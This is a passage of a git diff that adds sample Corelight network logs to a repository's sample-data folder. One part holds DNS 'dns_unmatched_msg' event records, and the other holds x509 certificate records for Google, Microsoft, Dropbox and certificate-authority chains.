+{"ts":"2018-08-03T23:39:17.620063Z","uid":"C3lXKD31M3AAMdnEml","id.orig_h":"192.168.0.54","id.orig_p":51374,"id.resp_h":"192.168.0.1","id.resp_p":53,"name":"dns_unmatched_msg","notice":false} +{"ts":"2018-08-03T23:39:17.827655Z","uid":"C3qyLe2s5MEJo7Poea","id.orig_h":"192.168.0.54","id.orig_p":49300,"id.resp_h":"192.168.0.1","id.resp_p":53,"name":"dns_unmatched_msg","notice":false} +{"ts":"2018-08-03T23:39:17.918770Z","uid":"CC0u793YgazRXgmIC7","id.orig_h":"192.168.0.54","id.orig_p":52408,"id.resp_h":"192.168.0.1","id.resp_p":53,"name":"dns_unmatched_msg","notice":false} +{"ts":"2018-08-03T23:39:17.827362Z","uid":"CkU65M1tAKw9sKcq01","id.orig_h":"192.168.0.51","id.orig_p":36033,"id.resp_h":"192.168.0.1","id.resp_p":53,"name":"dns_unmatched_msg","notice":false} +{"ts":"2018-08-03T23:39:17.958975Z","uid":"CIf6K22es58vN1JH5g","id.orig_h":"192.168.0.54","id.orig_p":60303,"id.resp_h":"192.168.0.1","id.resp_p":53,"name":"dns_unmatched_msg","notice":false} +{"ts":"2018-08-03T23:39:17.571993Z","uid":"C0rl3x2GZJjmBwiUtl","id.orig_h":"192.168.0.51","id.orig_p":11851,"id.resp_h":"192.168.0.1","id.resp_p":53,"name":"dns_unmatched_msg","notice":false} +{"ts":"2018-08-03T23:39:17.597125Z","uid":"CEqfcRExDQRtK7ihi","id.orig_h":"192.168.0.54","id.orig_p":54920,"id.resp_h":"192.168.0.1","id.resp_p":53,"name":"dns_unmatched_msg","notice":false} +{"ts":"2018-08-03T23:39:17.446246Z","uid":"CdN96A2xg40vyPrEN7","id.orig_h":"192.168.0.54","id.orig_p":62577,"id.resp_h":"192.168.0.1","id.resp_p":53,"name":"dns_unmatched_msg","notice":false} +{"ts":"2018-08-03T23:39:17.962629Z","uid":"CCI3if1Kf13DTlLFp","id.orig_h":"192.168.0.54","id.orig_p":60993,"id.resp_h":"192.168.0.1","id.resp_p":53,"name":"dns_unmatched_msg","notice":false} +{"ts":"2018-08-03T23:39:17.430219Z","uid":"CpncE82syil4olINW9","id.orig_h":"192.168.0.51","id.orig_p":22686,"id.resp_h":"192.168.0.1","id.resp_p":53,"name":"dns_unmatched_msg","notice":false} +{"ts":"2018-08-03T23:39:17.572100Z","uid":"CVlOYT27CMDJYGLmpg","id.orig_h":"192.168.0.54","id.orig_p":55002,"id.resp_h":"192.168.0.1","id.resp_p":53,"name":"dns_unmatched_msg","notice":false} +{"ts":"2018-08-03T23:39:17.713056Z","uid":"CZCooG3lwwY1YWjfEj","id.orig_h":"192.168.0.54","id.orig_p":55801,"id.resp_h":"192.168.0.1","id.resp_p":53,"name":"dns_unmatched_msg","notice":false} +{"ts":"2018-08-03T23:39:17.789653Z","uid":"Cm4aJd3AgISsiiFEgb","id.orig_h":"192.168.0.54","id.orig_p":59234,"id.resp_h":"192.168.0.1","id.resp_p":53,"name":"dns_unmatched_msg","notice":false} +{"ts":"2018-08-03T23:39:17.875718Z","uid":"C4HU7q1goo7aGR7al","id.orig_h":"192.168.0.54","id.orig_p":51238,"id.resp_h":"192.168.0.1","id.resp_p":53,"name":"dns_unmatched_msg","notice":false} +{"ts":"2018-08-03T23:39:17.728566Z","uid":"CWLk9u3wldiNU7OC6","id.orig_h":"192.168.0.54","id.orig_p":58642,"id.resp_h":"192.168.0.1","id.resp_p":53,"name":"dns_unmatched_msg","notice":false} +{"ts":"2018-08-03T23:39:17.490661Z","uid":"CxKknU3BcpvsjG0XI","id.orig_h":"192.168.0.51","id.orig_p":42365,"id.resp_h":"192.168.0.1","id.resp_p":53,"name":"dns_unmatched_msg","notice":false} +{"ts":"2018-08-03T23:39:18.528569Z","uid":"CvF4U04JXtFBC1778k","id.orig_h":"192.168.0.54","id.orig_p":61121,"id.resp_h":"192.168.0.1","id.resp_p":53,"name":"dns_unmatched_msg","notice":false} +{"ts":"2018-08-03T23:39:18.581547Z","uid":"CHhzcB1WrFzar27e68","id.orig_h":"192.168.0.54","id.orig_p":56064,"id.resp_h":"192.168.0.1","id.resp_p":53,"name":"dns_unmatched_msg","notice":false} +{"ts":"2018-08-03T23:39:18.569723Z","uid":"C9iui53s1oj0WVYpV8","id.orig_h":"192.168.0.51","id.orig_p":60379,"id.resp_h":"192.168.0.1","id.resp_p":53,"name":"dns_unmatched_msg","notice":false} +{"ts":"2018-08-03T23:39:18.584879Z","uid":"C6I9v125h02eIqQeOl","id.orig_h":"192.168.0.54","id.orig_p":54708,"id.resp_h":"192.168.0.1","id.resp_p":53,"name":"dns_unmatched_msg","notice":false} +{"ts":"2018-08-03T23:39:18.489359Z","uid":"CcaO9i4dcDPpx7uJvl","id.orig_h":"192.168.0.51","id.orig_p":39618,"id.resp_h":"192.168.0.1","id.resp_p":53,"name":"dns_unmatched_msg","notice":false} +{"ts":"2018-08-03T23:39:19.162274Z","uid":"CtBO9n2iyCLLEuLMs8","id.orig_h":"192.168.0.54","id.orig_p":53176,"id.resp_h":"192.168.0.1","id.resp_p":53,"name":"dns_unmatched_msg","notice":false} +{"ts":"2018-08-03T23:39:19.162274Z","uid":"CCA8wA4c2JLvalgii","id.orig_h":"192.168.0.54","id.orig_p":53817,"id.resp_h":"192.168.0.1","id.resp_p":53,"name":"dns_unmatched_msg","notice":false} +{"ts":"2018-08-03T23:39:18.628673Z","uid":"CszVf24ZxiuKCfCtJ","id.orig_h":"192.168.0.54","id.orig_p":64078,"id.resp_h":"192.168.0.1","id.resp_p":53,"name":"dns_unmatched_msg","notice":false} +{"ts":"2018-08-03T23:39:19.038464Z","uid":"C8S66I2QzvgXN11Kd5","id.orig_h":"192.168.0.54","id.orig_p":53700,"id.resp_h":"192.168.0.1","id.resp_p":53,"name":"dns_unmatched_msg","notice":false} +{"ts":"2018-08-03T23:39:19.073947Z","uid":"CatbBu1VH2alw9aisd","id.orig_h":"192.168.0.54","id.orig_p":64672,"id.resp_h":"192.168.0.1","id.resp_p":53,"name":"dns_unmatched_msg","notice":false} +{"ts":"2018-08-03T23:39:18.825857Z","uid":"CSi8NzYexSa5I9jJ9","id.orig_h":"192.168.0.54","id.orig_p":61813,"id.resp_h":"192.168.0.1","id.resp_p":53,"name":"dns_unmatched_msg","notice":false} +{"ts":"2018-08-03T23:39:19.048283Z","uid":"Cw5QPgtM0G0drY9x8","id.orig_h":"192.168.0.54","id.orig_p":54423,"id.resp_h":"192.168.0.1","id.resp_p":53,"name":"dns_unmatched_msg","notice":false} +{"ts":"2018-08-03T23:39:18.901689Z","uid":"CASzoy3QWV5Ho0r75f","id.orig_h":"192.168.0.54","id.orig_p":54540,"id.resp_h":"192.168.0.1","id.resp_p":53,"name":"dns_unmatched_msg","notice":false} +{"ts":"2018-08-03T23:39:19.144513Z","uid":"CBRkoR3lvXjBOp461k","id.orig_h":"192.168.0.51","id.orig_p":51338,"id.resp_h":"192.168.0.1","id.resp_p":53,"name":"dns_unmatched_msg","notice":false} +{"ts":"2018-08-03T23:39:18.527820Z","uid":"CkyLgA1TAzSNGrAdRf","id.orig_h":"192.168.0.54","id.orig_p":54131,"id.resp_h":"192.168.0.1","id.resp_p":53,"name":"dns_unmatched_msg","notice":false} +{"ts":"2018-08-03T23:39:19.053959Z","uid":"Cb0oDz1hEwX3a8sPc","id.orig_h":"192.168.0.54","id.orig_p":50281,"id.resp_h":"192.168.0.1","id.resp_p":53,"name":"dns_unmatched_msg","notice":false} +{"ts":"2018-08-03T23:39:19.211561Z","uid":"Cee4q23WQLcRqZlJ94","id.orig_h":"192.168.0.54","id.orig_p":57515,"id.resp_h":"192.168.0.1","id.resp_p":53,"name":"dns_unmatched_msg","notice":false} +{"ts":"2018-08-03T23:39:18.568559Z","uid":"CATSgW2JPVhX7ESua5","id.orig_h":"192.168.0.51","id.orig_p":39491,"id.resp_h":"192.168.0.1","id.resp_p":53,"name":"dns_unmatched_msg","notice":false} +{"ts":"2018-08-03T23:39:18.872776Z","uid":"CR1nf0433a3ialytj1","id.orig_h":"192.168.0.51","id.orig_p":64427,"id.resp_h":"192.168.0.1","id.resp_p":53,"name":"dns_unmatched_msg","notice":false} +{"ts":"2018-08-03T23:39:19.308033Z","uid":"CMMvTP2PNc0xC5kWvk","id.orig_h":"192.168.0.51","id.orig_p":48458,"id.resp_h":"192.168.0.1","id.resp_p":53,"name":"dns_unmatched_msg","notice":false} +{"ts":"2018-08-03T23:39:19.825907Z","uid":"C83b3V1vZIrsJ2P6lg","id.orig_h":"192.168.0.54","id.orig_p":54297,"id.resp_h":"192.168.0.1","id.resp_p":53,"name":"dns_unmatched_msg","notice":false} +{"ts":"2018-08-03T23:39:19.793311Z","uid":"CAdhMq3LBdw6Tw40oj","id.orig_h":"192.168.0.51","id.orig_p":53943,"id.resp_h":"192.168.0.1","id.resp_p":53,"name":"dns_unmatched_msg","notice":false} +{"ts":"2018-08-03T23:39:19.334330Z","uid":"CuKeDJ3zaOcws1t8wi","id.orig_h":"192.168.0.54","id.orig_p":50392,"id.resp_h":"192.168.0.1","id.resp_p":53,"name":"dns_unmatched_msg","notice":false} +{"ts":"2018-08-03T23:39:19.864909Z","uid":"C9ywaY2tEz5PCm2gmi","id.orig_h":"192.168.0.54","id.orig_p":63612,"id.resp_h":"192.168.0.1","id.resp_p":53,"name":"dns_unmatched_msg","notice":false} +{"ts":"2018-08-03T23:39:19.848609Z","uid":"CHJWCW3g7DUgXOExQg","id.orig_h":"192.168.0.54","id.orig_p":62969,"id.resp_h":"192.168.0.1","id.resp_p":53,"name":"dns_unmatched_msg","notice":false} diff --git a/Sample Data/Custom/Corelight/x509_20180803_16:37:08-16:40:00-0800.log_ b/Sample Data/Custom/Corelight/x509_20180803_16:37:08-16:40:00-0800.log_ new file mode 100644 index 0000000000..5fd7feee17 --- /dev/null +++ b/Sample Data/Custom/Corelight/x509_20180803_16:37:08-16:40:00-0800.log_ @@ -0,0 +1,200 @@ +{"ts":"2018-08-03T23:39:00.096941Z","id":"FtFpUL2NUUmnpYXSk","certificate.version":3,"certificate.serial":"12BBE6","certificate.subject":"CN=GeoTrust Global CA,O=GeoTrust Inc.,C=US","certificate.issuer":"OU=Equifax Secure Certificate Authority,O=Equifax,C=US","certificate.not_valid_before":"2002-05-21T11:00:00.000000Z","certificate.not_valid_after":"2018-08-21T11:00:00.000000Z","certificate.key_alg":"rsaEncryption","certificate.sig_alg":"sha1WithRSAEncryption","certificate.key_type":"rsa","certificate.key_length":2048,"certificate.exponent":"65537","basic_constraints.ca":true} +{"ts":"2018-08-03T23:39:00.104774Z","id":"FeILDk3eW5LnG31Gf8","certificate.version":3,"certificate.serial":"08457721D8AC28F3","certificate.subject":"CN=*.google.com,O=Google Inc,L=Mountain View,ST=California,C=US","certificate.issuer":"CN=Google Internet Authority G2,O=Google Inc,C=US","certificate.not_valid_before":"2015-03-25T22:50:35.000000Z","certificate.not_valid_after":"2015-06-23T07:00:00.000000Z","certificate.key_alg":"id-ecPublicKey","certificate.sig_alg":"sha1WithRSAEncryption","certificate.key_type":"ecdsa","certificate.key_length":256,"certificate.curve":"prime256v1","san.dns":["*.google.com","*.android.com","*.appengine.google.com","*.cloud.google.com","*.google-analytics.com","*.google.ca","*.google.cl","*.google.co.in","*.google.co.jp","*.google.co.uk","*.google.com.ar","*.google.com.au","*.google.com.br","*.google.com.co","*.google.com.mx","*.google.com.tr","*.google.com.vn","*.google.de","*.google.es","*.google.fr","*.google.hu","*.google.it","*.google.nl","*.google.pl","*.google.pt","*.googleadapis.com","*.googleapis.cn","*.googlecommerce.com","*.googlevideo.com","*.gstatic.cn","*.gstatic.com","*.gvt1.com","*.gvt2.com","*.metric.gstatic.com","*.urchin.com","*.url.google.com","*.youtube-nocookie.com","*.youtube.com","*.youtubeeducation.com","*.ytimg.com","android.com","g.co","goo.gl","google-analytics.com","google.com","googlecommerce.com","urchin.com","youtu.be","youtube.com","youtubeeducation.com"],"basic_constraints.ca":false} +{"ts":"2018-08-03T23:39:00.104774Z","id":"FGg0813V5c1TdFu8N2","certificate.version":3,"certificate.serial":"023A76","certificate.subject":"CN=Google Internet Authority G2,O=Google Inc,C=US","certificate.issuer":"CN=GeoTrust Global CA,O=GeoTrust Inc.,C=US","certificate.not_valid_before":"2013-04-05T22:15:55.000000Z","certificate.not_valid_after":"2017-01-01T07:59:59.000000Z","certificate.key_alg":"rsaEncryption","certificate.sig_alg":"sha1WithRSAEncryption","certificate.key_type":"rsa","certificate.key_length":2048,"certificate.exponent":"65537","basic_constraints.ca":true,"basic_constraints.path_len":0} +{"ts":"2018-08-03T23:39:00.104774Z","id":"FiM7MF4GdulmLcpxP2","certificate.version":3,"certificate.serial":"12BBE6","certificate.subject":"CN=GeoTrust Global CA,O=GeoTrust Inc.,C=US","certificate.issuer":"OU=Equifax Secure Certificate Authority,O=Equifax,C=US","certificate.not_valid_before":"2002-05-21T11:00:00.000000Z","certificate.not_valid_after":"2018-08-21T11:00:00.000000Z","certificate.key_alg":"rsaEncryption","certificate.sig_alg":"sha1WithRSAEncryption","certificate.key_type":"rsa","certificate.key_length":2048,"certificate.exponent":"65537","basic_constraints.ca":true} +{"ts":"2018-08-03T23:39:00.241349Z","id":"FlQigb4AB6QCsc7FLb","certificate.version":3,"certificate.serial":"5A0000D4A15F58124C4688433B00010000D4A1","certificate.subject":"CN=*.config.skype.com","certificate.issuer":"CN=Microsoft IT SSL SHA2,OU=Microsoft IT,O=Microsoft Corporation,L=Redmond,ST=Washington,C=US","certificate.not_valid_before":"2015-03-26T03:32:42.000000Z","certificate.not_valid_after":"2017-03-25T03:32:42.000000Z","certificate.key_alg":"rsaEncryption","certificate.sig_alg":"sha256WithRSAEncryption","certificate.key_type":"rsa","certificate.key_length":2048,"certificate.exponent":"65537","san.dns":["*.config.skype.com"]} +{"ts":"2018-08-03T23:39:00.241349Z","id":"FcKFGsCLJ0jrvQQ62","certificate.version":3,"certificate.serial":"07279AA9","certificate.subject":"CN=Microsoft IT SSL SHA2,OU=Microsoft IT,O=Microsoft Corporation,L=Redmond,ST=Washington,C=US","certificate.issuer":"CN=Baltimore CyberTrust Root,OU=CyberTrust,O=Baltimore,C=IE","certificate.not_valid_before":"2013-12-20T04:07:32.000000Z","certificate.not_valid_after":"2017-12-20T04:06:55.000000Z","certificate.key_alg":"rsaEncryption","certificate.sig_alg":"sha256WithRSAEncryption","certificate.key_type":"rsa","certificate.key_length":4096,"certificate.exponent":"65537","basic_constraints.ca":true,"basic_constraints.path_len":0} +{"ts":"2018-08-03T23:38:59.976806Z","id":"F3rNKZ3W4Up4XKtCNh","certificate.version":3,"certificate.serial":"08457721D8AC28F3","certificate.subject":"CN=*.google.com,O=Google Inc,L=Mountain View,ST=California,C=US","certificate.issuer":"CN=Google Internet Authority G2,O=Google Inc,C=US","certificate.not_valid_before":"2015-03-25T22:50:35.000000Z","certificate.not_valid_after":"2015-06-23T07:00:00.000000Z","certificate.key_alg":"id-ecPublicKey","certificate.sig_alg":"sha1WithRSAEncryption","certificate.key_type":"ecdsa","certificate.key_length":256,"certificate.curve":"prime256v1","san.dns":["*.google.com","*.android.com","*.appengine.google.com","*.cloud.google.com","*.google-analytics.com","*.google.ca","*.google.cl","*.google.co.in","*.google.co.jp","*.google.co.uk","*.google.com.ar","*.google.com.au","*.google.com.br","*.google.com.co","*.google.com.mx","*.google.com.tr","*.google.com.vn","*.google.de","*.google.es","*.google.fr","*.google.hu","*.google.it","*.google.nl","*.google.pl","*.google.pt","*.googleadapis.com","*.googleapis.cn","*.googlecommerce.com","*.googlevideo.com","*.gstatic.cn","*.gstatic.com","*.gvt1.com","*.gvt2.com","*.metric.gstatic.com","*.urchin.com","*.url.google.com","*.youtube-nocookie.com","*.youtube.com","*.youtubeeducation.com","*.ytimg.com","android.com","g.co","goo.gl","google-analytics.com","google.com","googlecommerce.com","urchin.com","youtu.be","youtube.com","youtubeeducation.com"],"basic_constraints.ca":false} +{"ts":"2018-08-03T23:38:59.976806Z","id":"FiZWlP2ucOpmf7Ynm7","certificate.version":3,"certificate.serial":"023A76","certificate.subject":"CN=Google Internet Authority G2,O=Google Inc,C=US","certificate.issuer":"CN=GeoTrust Global CA,O=GeoTrust Inc.,C=US","certificate.not_valid_before":"2013-04-05T22:15:55.000000Z","certificate.not_valid_after":"2017-01-01T07:59:59.000000Z","certificate.key_alg":"rsaEncryption","certificate.sig_alg":"sha1WithRSAEncryption","certificate.key_type":"rsa","certificate.key_length":2048,"certificate.exponent":"65537","basic_constraints.ca":true,"basic_constraints.path_len":0} +{"ts":"2018-08-03T23:38:59.976806Z","id":"F9uqTW2fkVItwIlri6","certificate.version":3,"certificate.serial":"12BBE6","certificate.subject":"CN=GeoTrust Global CA,O=GeoTrust Inc.,C=US","certificate.issuer":"OU=Equifax Secure Certificate Authority,O=Equifax,C=US","certificate.not_valid_before":"2002-05-21T11:00:00.000000Z","certificate.not_valid_after":"2018-08-21T11:00:00.000000Z","certificate.key_alg":"rsaEncryption","certificate.sig_alg":"sha1WithRSAEncryption","certificate.key_type":"rsa","certificate.key_length":2048,"certificate.exponent":"65537","basic_constraints.ca":true} +{"ts":"2018-08-03T23:39:00.263340Z","id":"FOjrklZl04wHbhdUd","certificate.version":3,"certificate.serial":"5A0000025C7ABC3C9821B7205400000000025C","certificate.subject":"CN=*.dc.trouter.io","certificate.issuer":"CN=Microsoft IT SSL SHA2,OU=Microsoft IT,O=Microsoft Corporation,L=Redmond,ST=Washington,C=US","certificate.not_valid_before":"2014-05-03T03:27:20.000000Z","certificate.not_valid_after":"2016-05-02T03:27:20.000000Z","certificate.key_alg":"rsaEncryption","certificate.sig_alg":"sha256WithRSAEncryption","certificate.key_type":"rsa","certificate.key_length":2048,"certificate.exponent":"65537","san.dns":["*.dc.trouter.io","go.trouter.io","*.drip.trouter.io"]} +{"ts":"2018-08-03T23:39:00.263340Z","id":"FwoJPw4TdhPBlnv6Ea","certificate.version":3,"certificate.serial":"07279AA9","certificate.subject":"CN=Microsoft IT SSL SHA2,OU=Microsoft IT,O=Microsoft Corporation,L=Redmond,ST=Washington,C=US","certificate.issuer":"CN=Baltimore CyberTrust Root,OU=CyberTrust,O=Baltimore,C=IE","certificate.not_valid_before":"2013-12-20T04:07:32.000000Z","certificate.not_valid_after":"2017-12-20T04:06:55.000000Z","certificate.key_alg":"rsaEncryption","certificate.sig_alg":"sha256WithRSAEncryption","certificate.key_type":"rsa","certificate.key_length":4096,"certificate.exponent":"65537","basic_constraints.ca":true,"basic_constraints.path_len":0} +{"ts":"2018-08-03T23:39:00.282718Z","id":"Fm2nFeeDah9hJbLq3","certificate.version":3,"certificate.serial":"6EFF8CDCF8934A7D","certificate.subject":"CN=*.mail.google.com,O=Google Inc,L=Mountain View,ST=California,C=US","certificate.issuer":"CN=Google Internet Authority G2,O=Google Inc,C=US","certificate.not_valid_before":"2015-03-25T22:11:20.000000Z","certificate.not_valid_after":"2015-06-23T07:00:00.000000Z","certificate.key_alg":"rsaEncryption","certificate.sig_alg":"sha1WithRSAEncryption","certificate.key_type":"rsa","certificate.key_length":2048,"certificate.exponent":"65537","san.dns":["*.mail.google.com","*.client-channel.google.com","*.docs.google.com","*.drive.google.com","*.plus.google.com","*.sites.google.com","*.talkgadget.google.com"],"basic_constraints.ca":false} +{"ts":"2018-08-03T23:39:00.282718Z","id":"FCBQiC3GqfQRZiq3Ob","certificate.version":3,"certificate.serial":"023A76","certificate.subject":"CN=Google Internet Authority G2,O=Google Inc,C=US","certificate.issuer":"CN=GeoTrust Global CA,O=GeoTrust Inc.,C=US","certificate.not_valid_before":"2013-04-05T22:15:55.000000Z","certificate.not_valid_after":"2017-01-01T07:59:59.000000Z","certificate.key_alg":"rsaEncryption","certificate.sig_alg":"sha1WithRSAEncryption","certificate.key_type":"rsa","certificate.key_length":2048,"certificate.exponent":"65537","basic_constraints.ca":true,"basic_constraints.path_len":0} +{"ts":"2018-08-03T23:39:00.282718Z","id":"FzDcNwSAXy6g7Zfrh","certificate.version":3,"certificate.serial":"12BBE6","certificate.subject":"CN=GeoTrust Global CA,O=GeoTrust Inc.,C=US","certificate.issuer":"OU=Equifax Secure Certificate Authority,O=Equifax,C=US","certificate.not_valid_before":"2002-05-21T11:00:00.000000Z","certificate.not_valid_after":"2018-08-21T11:00:00.000000Z","certificate.key_alg":"rsaEncryption","certificate.sig_alg":"sha1WithRSAEncryption","certificate.key_type":"rsa","certificate.key_length":2048,"certificate.exponent":"65537","basic_constraints.ca":true} +{"ts":"2018-08-03T23:39:00.305204Z","id":"FPVAfF1umdNbbga2Z9","certificate.version":3,"certificate.serial":"08457721D8AC28F3","certificate.subject":"CN=*.google.com,O=Google Inc,L=Mountain View,ST=California,C=US","certificate.issuer":"CN=Google Internet Authority G2,O=Google Inc,C=US","certificate.not_valid_before":"2015-03-25T22:50:35.000000Z","certificate.not_valid_after":"2015-06-23T07:00:00.000000Z","certificate.key_alg":"id-ecPublicKey","certificate.sig_alg":"sha1WithRSAEncryption","certificate.key_type":"ecdsa","certificate.key_length":256,"certificate.curve":"prime256v1","san.dns":["*.google.com","*.android.com","*.appengine.google.com","*.cloud.google.com","*.google-analytics.com","*.google.ca","*.google.cl","*.google.co.in","*.google.co.jp","*.google.co.uk","*.google.com.ar","*.google.com.au","*.google.com.br","*.google.com.co","*.google.com.mx","*.google.com.tr","*.google.com.vn","*.google.de","*.google.es","*.google.fr","*.google.hu","*.google.it","*.google.nl","*.google.pl","*.google.pt","*.googleadapis.com","*.googleapis.cn","*.googlecommerce.com","*.googlevideo.com","*.gstatic.cn","*.gstatic.com","*.gvt1.com","*.gvt2.com","*.metric.gstatic.com","*.urchin.com","*.url.google.com","*.youtube-nocookie.com","*.youtube.com","*.youtubeeducation.com","*.ytimg.com","android.com","g.co","goo.gl","google-analytics.com","google.com","googlecommerce.com","urchin.com","youtu.be","youtube.com","youtubeeducation.com"],"basic_constraints.ca":false} +{"ts":"2018-08-03T23:39:00.305204Z","id":"FK3yfj1929RUYZkmxh","certificate.version":3,"certificate.serial":"023A76","certificate.subject":"CN=Google Internet Authority G2,O=Google Inc,C=US","certificate.issuer":"CN=GeoTrust Global CA,O=GeoTrust Inc.,C=US","certificate.not_valid_before":"2013-04-05T22:15:55.000000Z","certificate.not_valid_after":"2017-01-01T07:59:59.000000Z","certificate.key_alg":"rsaEncryption","certificate.sig_alg":"sha1WithRSAEncryption","certificate.key_type":"rsa","certificate.key_length":2048,"certificate.exponent":"65537","basic_constraints.ca":true,"basic_constraints.path_len":0} +{"ts":"2018-08-03T23:39:00.305204Z","id":"F03ssb3k217IvJhZe8","certificate.version":3,"certificate.serial":"12BBE6","certificate.subject":"CN=GeoTrust Global CA,O=GeoTrust Inc.,C=US","certificate.issuer":"OU=Equifax Secure Certificate Authority,O=Equifax,C=US","certificate.not_valid_before":"2002-05-21T11:00:00.000000Z","certificate.not_valid_after":"2018-08-21T11:00:00.000000Z","certificate.key_alg":"rsaEncryption","certificate.sig_alg":"sha1WithRSAEncryption","certificate.key_type":"rsa","certificate.key_length":2048,"certificate.exponent":"65537","basic_constraints.ca":true} +{"ts":"2018-08-03T23:39:00.286031Z","id":"FsMZHPjIyOZEIhyW3","certificate.version":3,"certificate.serial":"03F93247476E47","certificate.subject":"CN=*.dropbox.com,OU=Domain Control Validated","certificate.issuer":"CN=Go Daddy Secure Certificate Authority - G2,OU=http://certs.godaddy.com/repository/,O=GoDaddy.com\u005c, Inc.,L=Scottsdale,ST=Arizona,C=US","certificate.not_valid_before":"2014-04-11T01:31:12.000000Z","certificate.not_valid_after":"2016-12-11T09:49:46.000000Z","certificate.key_alg":"rsaEncryption","certificate.sig_alg":"sha256WithRSAEncryption","certificate.key_type":"rsa","certificate.key_length":2048,"certificate.exponent":"65537","san.dns":["*.dropbox.com","dropbox.com"],"basic_constraints.ca":false} +{"ts":"2018-08-03T23:39:00.286031Z","id":"F8xbfQoVqqVP2vQb1","certificate.version":3,"certificate.serial":"07","certificate.subject":"CN=Go Daddy Secure Certificate Authority - G2,OU=http://certs.godaddy.com/repository/,O=GoDaddy.com\u005c, Inc.,L=Scottsdale,ST=Arizona,C=US","certificate.issuer":"CN=Go Daddy Root Certificate Authority - G2,O=GoDaddy.com\u005c, Inc.,L=Scottsdale,ST=Arizona,C=US","certificate.not_valid_before":"2011-05-03T14:00:00.000000Z","certificate.not_valid_after":"2031-05-03T14:00:00.000000Z","certificate.key_alg":"rsaEncryption","certificate.sig_alg":"sha256WithRSAEncryption","certificate.key_type":"rsa","certificate.key_length":2048,"certificate.exponent":"65537","basic_constraints.ca":true} +{"ts":"2018-08-03T23:39:00.286031Z","id":"FkhK3G3DWFPaR1OHf","certificate.version":3,"certificate.serial":"1BE715","certificate.subject":"CN=Go Daddy Root Certificate Authority - G2,O=GoDaddy.com\u005c, Inc.,L=Scottsdale,ST=Arizona,C=US","certificate.issuer":"OU=Go Daddy Class 2 Certification Authority,O=The Go Daddy Group\u005c, Inc.,C=US","certificate.not_valid_before":"2014-01-01T15:00:00.000000Z","certificate.not_valid_after":"2031-05-30T14:00:00.000000Z","certificate.key_alg":"rsaEncryption","certificate.sig_alg":"sha256WithRSAEncryption","certificate.key_type":"rsa","certificate.key_length":2048,"certificate.exponent":"65537","basic_constraints.ca":true} +{"ts":"2018-08-03T23:39:00.116545Z","id":"FMhq383Xv6YQ52c5g4","certificate.version":3,"certificate.serial":"03F93247476E47","certificate.subject":"CN=*.dropbox.com,OU=Domain Control Validated","certificate.issuer":"CN=Go Daddy Secure Certificate Authority - G2,OU=http://certs.godaddy.com/repository/,O=GoDaddy.com\u005c, Inc.,L=Scottsdale,ST=Arizona,C=US","certificate.not_valid_before":"2014-04-11T01:31:12.000000Z","certificate.not_valid_after":"2016-12-11T09:49:46.000000Z","certificate.key_alg":"rsaEncryption","certificate.sig_alg":"sha256WithRSAEncryption","certificate.key_type":"rsa","certificate.key_length":2048,"certificate.exponent":"65537","san.dns":["*.dropbox.com","dropbox.com"],"basic_constraints.ca":false} +{"ts":"2018-08-03T23:39:00.116545Z","id":"FdTNY22PBJlJPidM4l","certificate.version":3,"certificate.serial":"07","certificate.subject":"CN=Go Daddy Secure Certificate Authority - G2,OU=http://certs.godaddy.com/repository/,O=GoDaddy.com\u005c, Inc.,L=Scottsdale,ST=Arizona,C=US","certificate.issuer":"CN=Go Daddy Root Certificate Authority - G2,O=GoDaddy.com\u005c, Inc.,L=Scottsdale,ST=Arizona,C=US","certificate.not_valid_before":"2011-05-03T14:00:00.000000Z","certificate.not_valid_after":"2031-05-03T14:00:00.000000Z","certificate.key_alg":"rsaEncryption","certificate.sig_alg":"sha256WithRSAEncryption","certificate.key_type":"rsa","certificate.key_length":2048,"certificate.exponent":"65537","basic_constraints.ca":true} +{"ts":"2018-08-03T23:39:00.116545Z","id":"F6hYAj3eDOp44uDEU","certificate.version":3,"certificate.serial":"1BE715","certificate.subject":"CN=Go Daddy Root Certificate Authority - G2,O=GoDaddy.com\u005c, Inc.,L=Scottsdale,ST=Arizona,C=US","certificate.issuer":"OU=Go Daddy Class 2 Certification Authority,O=The Go Daddy Group\u005c, Inc.,C=US","certificate.not_valid_before":"2014-01-01T15:00:00.000000Z","certificate.not_valid_after":"2031-05-30T14:00:00.000000Z","certificate.key_alg":"rsaEncryption","certificate.sig_alg":"sha256WithRSAEncryption","certificate.key_type":"rsa","certificate.key_length":2048,"certificate.exponent":"65537","basic_constraints.ca":true} +{"ts":"2018-08-03T23:39:00.271078Z","id":"FwoJmv6JXvHYiQwg9","certificate.version":3,"certificate.serial":"08457721D8AC28F3","certificate.subject":"CN=*.google.com,O=Google Inc,L=Mountain View,ST=California,C=US","certificate.issuer":"CN=Google Internet Authority G2,O=Google Inc,C=US","certificate.not_valid_before":"2015-03-25T22:50:35.000000Z","certificate.not_valid_after":"2015-06-23T07:00:00.000000Z","certificate.key_alg":"id-ecPublicKey","certificate.sig_alg":"sha1WithRSAEncryption","certificate.key_type":"ecdsa","certificate.key_length":256,"certificate.curve":"prime256v1","san.dns":["*.google.com","*.android.com","*.appengine.google.com","*.cloud.google.com","*.google-analytics.com","*.google.ca","*.google.cl","*.google.co.in","*.google.co.jp","*.google.co.uk","*.google.com.ar","*.google.com.au","*.google.com.br","*.google.com.co","*.google.com.mx","*.google.com.tr","*.google.com.vn","*.google.de","*.google.es","*.google.fr","*.google.hu","*.google.it","*.google.nl","*.google.pl","*.google.pt","*.googleadapis.com","*.googleapis.cn","*.googlecommerce.com","*.googlevideo.com","*.gstatic.cn","*.gstatic.com","*.gvt1.com","*.gvt2.com","*.metric.gstatic.com","*.urchin.com","*.url.google.com","*.youtube-nocookie.com","*.youtube.com","*.youtubeeducation.com","*.ytimg.com","android.com","g.co","goo.gl","google-analytics.com","google.com","googlecommerce.com","urchin.com","youtu.be","youtube.com","youtubeeducation.com"],"basic_constraints.ca":false} +{"ts":"2018-08-03T23:39:00.271078Z","id":"FeQAu52V9aJV0i6wYb","certificate.version":3,"certificate.serial":"023A76","certificate.subject":"CN=Google Internet Authority G2,O=Google Inc,C=US","certificate.issuer":"CN=GeoTrust Global CA,O=GeoTrust Inc.,C=US","certificate.not_valid_before":"2013-04-05T22:15:55.000000Z","certificate.not_valid_after":"2017-01-01T07:59:59.000000Z","certificate.key_alg":"rsaEncryption","certificate.sig_alg":"sha1WithRSAEncryption","certificate.key_type":"rsa","certificate.key_length":2048,"certificate.exponent":"65537","basic_constraints.ca":true,"basic_constraints.path_len":0} +{"ts":"2018-08-03T23:39:00.271078Z","id":"FrXfnm1zYWSQQ0Re0i","certificate.version":3,"certificate.serial":"12BBE6","certificate.subject":"CN=GeoTrust Global CA,O=GeoTrust 